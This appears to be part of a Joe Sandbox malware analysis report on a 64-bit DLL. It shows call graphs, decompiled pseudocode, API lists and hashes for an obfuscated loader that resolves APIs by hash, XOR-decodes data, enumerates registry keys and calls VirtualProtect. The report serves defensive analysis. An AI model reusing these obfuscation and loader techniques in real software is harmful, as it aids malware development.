11332 201640c908c SetLastError 11331->11332 11333 201640c86b9 11332->11333 11333->11327 11334 201640c86dd HeapFree 11333->11334 11334->11327 12696 201640c4fdc 12697 201640c5010 12696->12697 12698 201640c5026 HeapFree 12697->12698 12700 201640c6ac0 12697->12700 12701 201640c908c SetLastError 12700->12701 12702 201640c6b05 HeapAlloc 12701->12702 12704 201640c6bfb 12702->12704 12705 201640c6b33 12702->12705 12704->12698 12706 201640c908c SetLastError 12705->12706 12707 201640c6b41 12706->12707 12708 201640c908c SetLastError 12707->12708 12709 201640c6bb4 12708->12709 12710 201640c8c6c 3 API calls 12709->12710 12711 201640c6bd4 12710->12711 12712 201640c908c SetLastError 12711->12712 12713 201640c6be2 HeapFree 12712->12713 12713->12704 11335 7ffc130ee7e0 11345 7ffc130f19f8 11335->11345 11346 7ffc130f1a04 11345->11346 11368 7ffc130ef2b0 EnterCriticalSection 11346->11368 11370 7ffc130ec5e0 11373 7ffc130ec61e _IsNonwritableInCurrentImage __C_specific_handler 11370->11373 11371 7ffc130ec701 11372 7ffc130ec6cc RtlUnwindEx 11372->11373 11373->11371 11373->11372 12715 201640c42d3 12716 201640c42e7 12715->12716 12717 201640c42f0 HeapFree 12716->12717 12718 201640c42eb 12716->12718 12717->12718

                                Executed Functions

                                Function 00007FFC130E2380 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 434memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 40%
                                			E00007FFC7FFC130E2380(signed int __rax, long long __rbx, void* __rcx, void* __rdx, signed int* __r8, void* __r9, long long __r12) {
				void* __rsi;
				signed int _t119;
				signed int _t160;
				void* _t163;
				signed int _t172;
				signed long long _t180;
				signed long long _t200;
				signed long long _t201;
				void* _t202;
				void* _t204;
				long long _t206;
				void* _t208;
				void* _t209;
				void* _t219;
				void* _t223;
				void* _t225;
				void* _t227;

				_t172 = __rax;
				goto 0x13101440;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t219 = _t208;
				 *((long long*)(_t219 + 0x18)) = __rbx;
				 *((long long*)(_t219 + 0x20)) = _t206;
				_push(_t204);
				_t209 = _t208 - 0x60;
				r13d = __r9 + 0x6ab;
				 *(_t209 + 0xb8) =  *((intOrPtr*)(_t209 + 0xc8)) + 0x152;
				 *((intOrPtr*)(_t209 + 0x98)) =  *(_t209 + 0xb8) + 0xfffffc37;
				r14d = __rcx + 0x37e1;
				r15d = __rdx + 0x1249;
				r14d =  <  ? __r9 - 0x2103 : r14d;
				if (r15d - _t206 + 0x3a59 > 0) goto 0x130e2709;
				 *((long long*)(_t219 + 8)) = __r12;
				_t163 = r14d - _t227 + 0x108;
				if (_t163 > 0) goto 0x130e25c8;
				 *((long long*)(_t219 - 0x60)) = 0x2032;
				r12d = 0x3189;
				 *(_t209 + 0x20) = 0x3595;
				r8d = r12d;
				r9d = 0x1f2c;
				E00007FFC7FFC130E9AC0(__r8, __rcx, __r8, _t206, _t227); // executed
				r11d = _t202 + 0x19d;
				 *(_t209 + 0x50) = __r8;
				r10d = _t225 - 0x1033;
				__r8[0x22] = _t172;
				 *(_t209 + 0x48) = _t223 - 0x3b8;
				_t160 = __rcx - 0x114f;
				 *(_t209 + 0x40) = r10d;
				r8d = __rcx - 0x2ad;
				 *(_t209 + 0x38) = r11d;
				r9d = _t225 - 0x16de;
				 *(_t209 + 0x30) = _t206 + 0x36e7;
				 *((intOrPtr*)(_t209 + 0x28)) = __rdx + 0xfffffa9a;
				 *(_t209 + 0x20) = _t160;
				E00007FFC7FFC130FF160(_t172, __r8, __r8, _t225, _t223, _t202);
				r8d = 0;
				if (_t163 == 0) goto 0x130e2589;
				r9d = r8d;
				asm("o16 nop [eax+eax]");
				_t200 = __r8[0x90];
				 *(__r9 + __r8[0x22]) =  *(_t200 + __r8[2]) & 0x000000ff ^  *(__r8[0x14] + __r9);
				__r8[0x90] = ( *((intOrPtr*)(__r8[0x10] + 0x130)) - 0x23f6) % __r8[0xe];
				__r8[0x7c] = __r8[0x7c] + 0x1f2c;
				if (__r8[0x78] != __r8[0xc]) goto 0x130e2568;
				__r8[0x32] = __r8[0x32] + 0xffffdfce;
				r8d = r8d + 1;
				_t180 = r8d;
				if (_t180 - _t200 < 0) goto 0x130e24f0;
				__r8[0x66] = __r8[0x66] | 0x0a01b449;
				_t119 = __r8[0x4c] ^ 0x0000127e;
				if (_t119 - r12d >= 0) goto 0x130e25b8;
				r12d = r12d - _t119;
				__r8[0x66] = __r8[0x66] + _t180 * 0x44f9;
				__r8[0x56] = __r8[0x14];
				goto 0x130e2701;
				if (r14d - _t204 + 0x329d + r14d >= 0) goto 0x130e2624;
				_t201 = _t200 | __r8[0x2a];
				if (__r8[0x2e] - _t201 > 0) goto 0x130e2624;
				if ( *((intOrPtr*)( *__r8 + 0x1d0)) + 0x8acf - _t201 <= 0) goto 0x130e2610;
				__r8[0x32] = __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032);
				if (__r8[0x7e] - (_t160 | r13d) < 0) goto 0x130e26ed;
				r10d = _t160;
				r11d = __r8[0x78];
				r15d = r15d - (__r8[6] ^ r15d);
				r11d = r11d - __r8[0x74];
				r11d = r11d + __r8[0x24];
				r14d = r14d *  *__r8;
				r15d = r15d + 0xea7;
				r10d = r10d - __r8[0x12];
				r15d = r15d ^ 0x00002598;
				r8d = __r8[4];
				r9d = _t160;
				r8d = r8d &  *(_t209 + 0xb8);
				r12d = 0x3189;
				 *(_t209 + 0x58) = __r8[0x54] & 0x0000228c;
				r9d = r9d | r12d;
				 *(_t209 + 0x50) = _t160 & 0x00003666;
				 *(_t209 + 0x48) = r11d;
				 *(_t209 + 0x40) = __r8;
				 *(_t209 + 0x38) = r10d;
				 *(_t209 + 0x30) = r15d;
				 *((intOrPtr*)(_t209 + 0x28)) = _t223 - 0x343a;
				 *(_t209 + 0x20) = r14d;
				E00007FFC7FFC130E2060(__r8, _t160 | r13d, _t201, _t204, _t206, __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032));
				__r8[0x62] = __r8[0x62] - __r8[0x4c] + _t160;
				return  *((intOrPtr*)(_t209 + 0xc0)) + 0xffffee61;
			}




















                                0x7ffc130e2380
                                0x7ffc130e2385
                                0x7ffc130e238a
                                0x7ffc130e238b
                                0x7ffc130e238c
                                0x7ffc130e238d
                                0x7ffc130e238e
                                0x7ffc130e238f
                                0x7ffc130e2390
                                0x7ffc130e2393
                                0x7ffc130e2397
                                0x7ffc130e239b
                                0x7ffc130e23a3
                                0x7ffc130e23bc
                                0x7ffc130e23d4
                                0x7ffc130e23e1
                                0x7ffc130e23eb
                                0x7ffc130e23f2
                                0x7ffc130e2402
                                0x7ffc130e240f
                                0x7ffc130e241c
                                0x7ffc130e2420
                                0x7ffc130e2423
                                0x7ffc130e242e
                                0x7ffc130e2436
                                0x7ffc130e243c
                                0x7ffc130e2441
                                0x7ffc130e2444
                                0x7ffc130e2452
                                0x7ffc130e245e
                                0x7ffc130e2465
                                0x7ffc130e246a
                                0x7ffc130e2471
                                0x7ffc130e248b
                                0x7ffc130e248f
                                0x7ffc130e2495
                                0x7ffc130e249a
                                0x7ffc130e24a1
                                0x7ffc130e24a6
                                0x7ffc130e24ad
                                0x7ffc130e24b8
                                0x7ffc130e24c3
                                0x7ffc130e24c7
                                0x7ffc130e24cf
                                0x7ffc130e24de
                                0x7ffc130e24e4
                                0x7ffc130e24e7
                                0x7ffc130e24f0
                                0x7ffc130e250e
                                0x7ffc130e2534
                                0x7ffc130e253e
                                0x7ffc130e255b
                                0x7ffc130e255d
                                0x7ffc130e256b
                                0x7ffc130e257d
                                0x7ffc130e2583
                                0x7ffc130e258f
                                0x7ffc130e259a
                                0x7ffc130e25a2
                                0x7ffc130e25a4
                                0x7ffc130e25b1
                                0x7ffc130e25bc
                                0x7ffc130e25c3
                                0x7ffc130e25d4
                                0x7ffc130e25ea
                                0x7ffc130e25f4
                                0x7ffc130e261b
                                0x7ffc130e261d
                                0x7ffc130e2634
                                0x7ffc130e263d
                                0x7ffc130e2649
                                0x7ffc130e2650
                                0x7ffc130e2653
                                0x7ffc130e266d
                                0x7ffc130e267a
                                0x7ffc130e267e
                                0x7ffc130e2685
                                0x7ffc130e2689
                                0x7ffc130e2690
                                0x7ffc130e2694
                                0x7ffc130e26b2
                                0x7ffc130e26ba
                                0x7ffc130e26c0
                                0x7ffc130e26c4
                                0x7ffc130e26c7
                                0x7ffc130e26cb
                                0x7ffc130e26d0
                                0x7ffc130e26d5
                                0x7ffc130e26da
                                0x7ffc130e26df
                                0x7ffc130e26e3
                                0x7ffc130e26e8
                                0x7ffc130e26fa
                                0x7ffc130e272d

                                APIs
                                • GetProcessHeap.KERNEL32 ref: 00007FFC13101456
                                • HeapAlloc.KERNEL32 ref: 00007FFC13101467
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7CFC
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7E18
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: HeapProtectVirtual$AllocProcess
                                • String ID: 2 $6$62 $662 $7$8662
                                • API String ID: 3541638468-3329516171
                                • Opcode ID: 59bb83eef75242a5c0dbf160cfb2881c3e280effa3ab4466507c8ae61b5f1636
                                • Instruction ID: 799a62481cb79f975a68f88121b026e27988392592366ed8ebdcb442330c63ba
                                • Opcode Fuzzy Hash: 59bb83eef75242a5c0dbf160cfb2881c3e280effa3ab4466507c8ae61b5f1636
                                • Instruction Fuzzy Hash: 5232F2735182C18BE371CF29E44479EBBA4F788748F148129EA899BB59DB7CE954CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C37E0 Relevance: 10.8, APIs: 7, Instructions: 333memoryregistryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 101 201640c37e0-201640c3845 GetModuleHandleA call 201640c40f8 104 201640c38bf-201640c38c2 101->104 105 201640c3847-201640c3858 call 201640c908c 101->105 107 201640c3cc0-201640c3cd5 104->107 108 201640c38c8-201640c38e1 HeapAlloc 104->108 112 201640c385a-201640c3864 105->112 113 201640c3866 105->113 110 201640c3cbb 108->110 111 201640c38e7-201640c3905 call 201640c487a call 201640c908c 108->111 110->107 123 201640c390d-201640c394c call 201640c638c call 201640c908c 111->123 124 201640c3907 111->124 115 201640c3869-201640c387a call 201640c40f8 112->115 113->115 115->104 122 201640c387c-201640c3892 call 201640c5fc8 115->122 122->104 129 201640c3894-201640c38a0 call 201640c5fc8 122->129 134 201640c395e 123->134 135 201640c394e-201640c395c 123->135 124->123 133 201640c38a5-201640c38aa 129->133 133->104 136 201640c38ac-201640c38bd call 201640c5fc8 133->136 137 201640c3961-201640c3968 134->137 135->137 136->104 140 201640c398e-201640c39b6 HeapAlloc 137->140 141 201640c396a-201640c397b call 201640c908c 137->141 142 201640c3a8e 140->142 143 201640c39bc-201640c39d0 call 201640c908c 140->143 152 201640c397d-201640c397f 141->152 153 201640c3984-201640c3989 141->153 147 201640c3a93-201640c3a99 142->147 155 201640c39fb 143->155 156 201640c39d2-201640c39f9 RegOpenKeyW 143->156 150 201640c3a9f-201640c3ae9 call 201640c47b0 call 201640ca0ac 147->150 151 201640c3cb1-201640c3cb9 call 201640c6ce4 147->151 169 201640c3aeb-201640c3b03 call 201640ca0ac 150->169 170 201640c3b05-201640c3b08 150->170 151->107 163 201640c3caa 152->163 154 201640c3cac-201640c3caf 153->154 154->107 154->151 160 201640c39fe-201640c3a00 155->160 156->160 164 201640c3a7e-201640c3a8c HeapFree 160->164 165 201640c3a02-201640c3a13 call 201640c908c 160->165 163->154 164->147 174 201640c3a30 165->174 175 201640c3a15-201640c3a2e RegEnumKeyW 165->175 169->170 170->151 173 201640c3b0e-201640c3b1f call 201640c5058 170->173 185 201640c3b4b-201640c3b4e 173->185 186 201640c3b21-201640c3b35 call 201640c405c 173->186 178 201640c3a33-201640c3a35 174->178 175->178 180 201640c3a4c-201640c3a52 178->180 181 201640c3a37-201640c3a4a call 201640c6644 178->181 183 201640c3a5d-201640c3a6e call 201640c908c 180->183 184 201640c3a54-201640c3a5b 180->184 181->165 181->180 195 201640c3a70-201640c3a78 RegCloseKey 183->195 196 201640c3a7a-201640c3a7c 183->196 184->183 185->151 190 201640c3b54-201640c3b57 call 201640ca7a0 185->190 186->185 197 201640c3b37-201640c3b47 call 201640c405c 186->197 194 201640c3b5c-201640c3b5f 190->194 198 201640c3b6b-201640c3b99 194->198 199 201640c3b61-201640c3b66 194->199 195->196 196->147 196->164 197->185 201 201640c3baf 198->201 202 201640c3b9b-201640c3ba3 198->202 199->151 205 201640c3bb2-201640c3bb5 201->205 204 201640c3ba5-201640c3bad call 201640c4d70 202->204 202->205 204->205 207 201640c3bb7-201640c3bbc 205->207 208 201640c3bc1-201640c3bd6 call 201640ca8e8 205->208 207->151 208->207 212 201640c3bd8-201640c3bf4 call 201640c908c 208->212 215 201640c3bfc 212->215 216 201640c3bf6-201640c3bfa 212->216 217 201640c3bff-201640c3c07 215->217 216->217 219 201640c3c9d-201640c3ca5 call 201640c9d6c 217->219 220 201640c3c0d-201640c3c1e call 201640c908c 217->220 219->163 224 201640c3c20-201640c3c24 220->224 225 201640c3c26 220->225 226 201640c3c29-201640c3c3a call 201640c908c 224->226 225->226 230 201640c3c4b 226->230 231 201640c3c3c-201640c3c49 226->231 232 201640c3c4e-201640c3c55 230->232 231->232 234 201640c3c6f-201640c3c7c call 201640c908c 232->234 235 201640c3c57-201640c3c64 call 201640c908c 232->235 241 201640c3c7e-201640c3c8d 234->241 242 201640c3c8f 234->242 235->152 240 201640c3c6a-201640c3c6d 235->240 240->154 243 201640c3c92-201640c3c95 241->243 242->243 243->107 244 201640c3c97-201640c3c9b 243->244 244->235
                                C-Code - Quality: 41%
                                			E00000201201640C37E0(long long* __rax, long long __rcx, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t100;
				void* _t176;
				long long* _t222;
				long long* _t223;
				long long* _t224;
				long long _t225;
				intOrPtr _t226;
				long long* _t228;
				long long* _t229;
				void* _t230;
				void* _t288;
				long long _t289;
				void* _t291;
				void* _t294;
				intOrPtr _t295;
				intOrPtr _t296;
				void* _t300;
				void* _t301;
				void* _t303;
				void* _t310;
				void* _t313;
				long long _t314;
				void* _t315;
				void* _t316;
				long long _t319;
				long long* _t320;
				void* _t322;
				CHAR* _t327;

				_t222 = __rax;
				 *((long long*)(_t300 + 8)) = __rcx;
				_t301 = _t300 - 0x248;
				_t292 =  *0x640cd458;
				_t295 =  *((intOrPtr*)( *0x640cd458 + 8));
				 *((long long*)(_t301 + 0x20)) =  *0x640cd448;
				 *(_t301 + 0x298) =  *0x640cd450;
				GetModuleHandleA(_t327);
				_t80 = E00000201201640C40F8(__rax,  *0x640cd458 + 0x18, _t303, _t313, _t322, _t319);
				r13d = 0;
				if (_t80 != r13d) goto 0x640c38bf;
				E00000201201640C908C(0xa30cd0f3, _t222,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t222 == _t319) goto 0x640c3866;
				 *_t222();
				goto 0x640c3869;
				_t223 = _t319;
				if (E00000201201640C40F8(_t223, _t292 + 0x10, _t303, _t313, _t316, _t288) != r13d) goto 0x640c38bf;
				_t84 = E00000201201640C5FC8(_t223, _t230,  *0x640cd448 + 0x201640d1082, _t292 + 0x28, _t292, _t295, _t291, _t294); // executed
				if (_t84 != r13d) goto 0x640c38bf;
				_t85 = E00000201201640C5FC8(_t223, _t230,  *0x640cd448 + 0x201640d1079, _t292 + 0x20, _t292, _t295); // executed
				if (_t85 != r13d) goto 0x640c38bf;
				if (E00000201201640C5FC8(_t223, _t230,  *0x640cd448 + 0x201640d1092, _t292 + 0x30, _t292, _t295) != r13d) goto 0x640c3cc0;
				HeapAlloc(??, ??, ??);
				_t289 = _t223;
				if (_t223 == _t319) goto 0x640c3cbb;
				E00000201201640C487A();
				E00000201201640C908C(0x9ffc4c27, _t223,  *((intOrPtr*)(_t292 + 0x10)));
				if (_t223 == _t319) goto 0x640c390d;
				 *_t223();
				_t24 = _t289 + 0xa8; // 0xa8
				_t224 = _t24;
				 *_t224 = _t224;
				 *((long long*)(_t289 + 0xb0)) = _t224;
				 *(_t289 + 0x9c) = r13d;
				 *(_t289 + 0xa0) = r13d;
				 *(_t289 + 0x98) = r13d;
				E00000201201640C638C(_t224, _t230, _t292, _t230);
				E00000201201640C908C(0xdc444c2b, _t224,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t224 == _t319) goto 0x640c395e;
				r9d = 0;
				r8d = 0;
				 *_t224();
				goto 0x640c3961;
				_t225 = _t319;
				 *((long long*)(_t289 + 0x28)) = _t225;
				if (_t225 != _t319) goto 0x640c398e;
				E00000201201640C908C(0xc06f8334, _t225,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t225 == _t319) goto 0x640c3984;
				 *_t225();
				goto 0x640c3caa;
				goto 0x640c3cac;
				r8d = 0x1102;
				HeapAlloc(??, ??, ??);
				_t320 = _t225;
				_t34 = _t295 + 0x7f; // 0x7f
				r12d = _t34;
				if (_t225 == _t295) goto 0x640c3a8e;
				 *_t225 = 0;
				E00000201201640C908C(0x3d06c463, _t225,  *((intOrPtr*)( *0x640cd458 + 0x20)));
				if (_t225 == _t295) goto 0x640c39fb;
				RegOpenKeyW(??, ??, ??); // executed
				goto 0x640c39fe;
				if (r12d != 0) goto 0x640c3a7e;
				E00000201201640C908C(0xdf514773, _t225,  *((intOrPtr*)( *0x640cd458 + 0x20)));
				if (_t225 == 0) goto 0x640c3a30;
				r9d = 0x104;
				RegEnumKeyW(??, ??, ??, ??); // executed
				goto 0x640c3a33;
				if (r12d != 0) goto 0x640c3a4c;
				_t100 = E00000201201640C6644(_t225, _t230, _t320, _t301 + 0x30, _t292, _t301 + 0x30, _t313);
				if (_t100 == 0) goto 0x640c3a02;
				if (_t100 != 0x103) goto 0x640c3a5d;
				 *0x640cd438 = _t320;
				E00000201201640C908C(0xbba3b4b6, _t225,  *((intOrPtr*)( *0x640cd458 + 0x20)));
				if (_t225 == 0) goto 0x640c3a7a;
				RegCloseKey(??); // executed
				if (0 == 0) goto 0x640c3a93;
				HeapFree(??, ??, ??);
				goto 0x640c3a93;
				r13d = 0;
				if (8 != r13d) goto 0x640c3cb1;
				_t296 =  *0x640cd448;
				_t47 = _t320 + 8; // 0x8
				r8d = _t47;
				0x640c47b0();
				 *((intOrPtr*)(_t301 + 0x2a6)) = r13w;
				if (E00000201201640CA0AC(8, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, 0x201640c0000 + _t296 + 0x11188) == r13d) goto 0x640c3b05;
				_t310 = 0x201640c0000 + _t296 + 0x111e0;
				if (E00000201201640CA0AC(_t104, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, _t310) != r13d) goto 0x640c3cb1;
				_t57 = _t289 + 8; // 0x8
				_t286 = _t57;
				if (E00000201201640C5058(_t225, _t230, _t289, _t57, _t292, _t296) != r13d) goto 0x640c3b4b;
				E00000201201640C405C(_t230, _t289, _t57, _t289, _t292, _t296);
				 *((long long*)(_t289 + 0x30)) = _t225;
				if (_t225 == _t320) goto 0x640c3b4b;
				_t59 = _t289 + 8; // 0x8
				E00000201201640C405C(_t230, _t59, _t57, _t289, _t292, _t296);
				 *((long long*)(_t289 + 0x38)) = _t225;
				_t144 =  !=  ? r13d : 8;
				_t207 = ( !=  ? r13d : 8) - r13d;
				if (( !=  ? r13d : 8) != r13d) goto 0x640c3cb1;
				if (E00000201201640CA7A0(_t176, _t225, _t230, _t289, _t286, __r9) != r13d) goto 0x640c3b6b;
				goto 0x640c3cb1;
				_t226 =  *((intOrPtr*)(_t301 + 0x20));
				r9d =  *(_t301 + 0x298);
				_t314 = _t226 + 0x201640cf000;
				r8d =  *(_t314 + 2) & 0x0000ffff;
				if (_t226 - _t310 + 8 <= 0) goto 0x640c3baf;
				if ((r9d ^ 0xe49a1e6d) == r13d) goto 0x640c3bb2;
				E00000201201640C4D70(r9d ^ 0xe49a1e6d, _t310 + _t314 + 8);
				goto 0x640c3bb2;
				_t228 = _t320;
				if (_t228 != _t320) goto 0x640c3bc1;
				goto 0x640c3cb1;
				r9d = r9d ^ 0xecb028fc;
				E00000201201640CA8E8(r9d, _t228, _t314, __r9);
				if (_t228 == _t320) goto 0x640c3bb7;
				 *((long long*)(_t289 + 0x40)) = _t314;
				 *0x640cd440 = _t289;
				E00000201201640C908C(0xa30cd0f3, _t228,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t228 == _t320) goto 0x640c3bfc;
				 *_t228();
				goto 0x640c3bff;
				_t229 = _t320;
				if (_t229 ==  *((intOrPtr*)(_t301 + 0x290))) goto 0x640c3c9d;
				E00000201201640C908C(0x9f72cbe0, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 == _t320) goto 0x640c3c26;
				 *_t229();
				goto 0x640c3c29;
				E00000201201640C908C(0xaade337c, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 == _t320) goto 0x640c3c4b;
				r8d = r13d;
				 *_t229();
				goto 0x640c3c4e;
				if (_t320 != _t320) goto 0x640c3c6f;
				E00000201201640C908C(0xc06f8334, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 != _t320) goto 0x640c397d;
				goto 0x640c3cac;
				E00000201201640C908C(0x1c8cff93, _t229,  *((intOrPtr*)(_t292 + 0x18)));
				if (_t229 == _t320) goto 0x640c3c8f;
				 *_t229();
				goto 0x640c3c92;
				if (r13d != r13d) goto 0x640c3cc0;
				goto 0x640c3c57;
				asm("lock add dword [esi+0x38], 0x1");
				if (E00000201201640C9D6C(r12d, 0x1c8cff93, _t230, _t289, _t320, _t289, __r9, _t314, _t315) == r13d) goto 0x640c3cc0;
				E00000201201640C6CE4(_t229, _t230, _t289, _t320, _t292);
				goto 0x640c3cc0;
				return 8;
			}






































                                0x201640c37e0
                                0x201640c37e0
                                0x201640c37f1
                                0x201640c37ff
                                0x201640c380c
                                0x201640c3817
                                0x201640c3824
                                0x201640c382b
                                0x201640c3838
                                0x201640c383d
                                0x201640c3845
                                0x201640c3850
                                0x201640c3858
                                0x201640c3862
                                0x201640c3864
                                0x201640c3866
                                0x201640c387a
                                0x201640c3888
                                0x201640c3892
                                0x201640c38a0
                                0x201640c38aa
                                0x201640c38c2
                                0x201640c38d5
                                0x201640c38db
                                0x201640c38e1
                                0x201640c38ef
                                0x201640c38fd
                                0x201640c3905
                                0x201640c390b
                                0x201640c390d
                                0x201640c390d
                                0x201640c3917
                                0x201640c391a
                                0x201640c3921
                                0x201640c3928
                                0x201640c392f
                                0x201640c3936
                                0x201640c3944
                                0x201640c394c
                                0x201640c394e
                                0x201640c3951
                                0x201640c395a
                                0x201640c395c
                                0x201640c395e
                                0x201640c3961
                                0x201640c3968
                                0x201640c3973
                                0x201640c397b
                                0x201640c397d
                                0x201640c397f
                                0x201640c3989
                                0x201640c3997
                                0x201640c39a4
                                0x201640c39ac
                                0x201640c39af
                                0x201640c39af
                                0x201640c39b6
                                0x201640c39bc
                                0x201640c39c8
                                0x201640c39d0
                                0x201640c39f5
                                0x201640c39f9
                                0x201640c3a00
                                0x201640c3a0b
                                0x201640c3a13
                                0x201640c3a22
                                0x201640c3a2a
                                0x201640c3a2e
                                0x201640c3a35
                                0x201640c3a41
                                0x201640c3a4a
                                0x201640c3a52
                                0x201640c3a54
                                0x201640c3a66
                                0x201640c3a6e
                                0x201640c3a78
                                0x201640c3a7c
                                0x201640c3a86
                                0x201640c3a8c
                                0x201640c3a93
                                0x201640c3a99
                                0x201640c3a9f
                                0x201640c3aa6
                                0x201640c3aa6
                                0x201640c3ab7
                                0x201640c3ad6
                                0x201640c3ae9
                                0x201640c3aeb
                                0x201640c3b08
                                0x201640c3b0e
                                0x201640c3b0e
                                0x201640c3b1f
                                0x201640c3b29
                                0x201640c3b2e
                                0x201640c3b35
                                0x201640c3b37
                                0x201640c3b3b
                                0x201640c3b43
                                0x201640c3b47
                                0x201640c3b4b
                                0x201640c3b4e
                                0x201640c3b5f
                                0x201640c3b66
                                0x201640c3b6b
                                0x201640c3b70
                                0x201640c3b78
                                0x201640c3b83
                                0x201640c3b99
                                0x201640c3ba3
                                0x201640c3ba8
                                0x201640c3bad
                                0x201640c3baf
                                0x201640c3bb5
                                0x201640c3bbc
                                0x201640c3bc1
                                0x201640c3bce
                                0x201640c3bd6
                                0x201640c3bd8
                                0x201640c3be5
                                0x201640c3bec
                                0x201640c3bf4
                                0x201640c3bf8
                                0x201640c3bfa
                                0x201640c3bfc
                                0x201640c3c07
                                0x201640c3c16
                                0x201640c3c1e
                                0x201640c3c20
                                0x201640c3c24
                                0x201640c3c32
                                0x201640c3c3a
                                0x201640c3c3e
                                0x201640c3c44
                                0x201640c3c49
                                0x201640c3c55
                                0x201640c3c5c
                                0x201640c3c64
                                0x201640c3c6d
                                0x201640c3c74
                                0x201640c3c7c
                                0x201640c3c8b
                                0x201640c3c8d
                                0x201640c3c95
                                0x201640c3c9b
                                0x201640c3c9d
                                0x201640c3caf
                                0x201640c3cb4
                                0x201640c3cb9
                                0x201640c3cd5

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpen
                                • String ID:
                                • API String ID: 2248784776-0
                                • Opcode ID: d8c896fb4c5f19e360938b71e439c2f71d6688fd5b8e83448aeef5f05ba6c7cf
                                • Instruction ID: acf4623f4be389d287bc2ae7fd822423cf283225cec474105ea2f4268f916278
                                • Opcode Fuzzy Hash: d8c896fb4c5f19e360938b71e439c2f71d6688fd5b8e83448aeef5f05ba6c7cf
                                • Instruction Fuzzy Hash: 16D1C425320760D7EA609761E88E3EE6359F788788F500411FF4E47B9BDE3AD4B98308
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640CA0AC Relevance: 3.1, APIs: 2, Instructions: 105filenativeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: File$CreateDirectoryErrorLastQuery
                                • String ID:
                                • API String ID: 2967190759-0
                                • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction ID: 448d1cc3037f81d1e21f368a9e7d0d0d291ce2c8f67b14eeb9d49a880cd15188
                                • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction Fuzzy Hash: FF41D0323047A0CBEB508B52E84939D62A4F7CC790F284525EF9D43BCACF3AD8258B14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E6D50 Relevance: 1.4, APIs: 1, Instructions: 190memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 60%
                                			E00007FFC7FFC130E6D50(intOrPtr __ecx, void* __rax, void* __rcx, signed int* __rdx, long long __rsi, void* __r8) {
				void* __rbx;
				void* __r13;
				signed int _t112;
				signed int _t117;
				signed int _t153;
				signed int _t161;
				signed int _t169;
				signed int _t176;
				signed int _t183;
				long long _t184;
				void* _t186;
				void* _t190;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t201;
				signed int* _t202;
				void* _t203;
				void* _t206;
				long _t208;
				void* _t211;

				_t199 = __r8;
				_t186 = __rcx;
				 *((long long*)(_t196 + 0x10)) = __rdx;
				 *((intOrPtr*)(_t196 + 8)) = __ecx;
				_push(_t184);
				_push(_t194);
				_push(_t190);
				_push(_t206);
				_t197 = _t196 - 0x90;
				_t176 =  *(_t197 + 0x130);
				r11d = r9d;
				r10d = __rax - 0x16de;
				 *((intOrPtr*)(_t197 + 0xe8)) = __rcx + 0x114f;
				r13d = __rax - 0x37e1;
				 *(_t197 + 0x130) = r10d;
				r15d = _t190 - 0x23f6;
				 *(_t197 + 0x80) = _t194 + 0x17b;
				r8d = _t211 + 0x3a59;
				r12d = __rcx - 0x165d;
				 *(_t197 + 0x100) = r12d;
				r9d = __rcx - 0x1351;
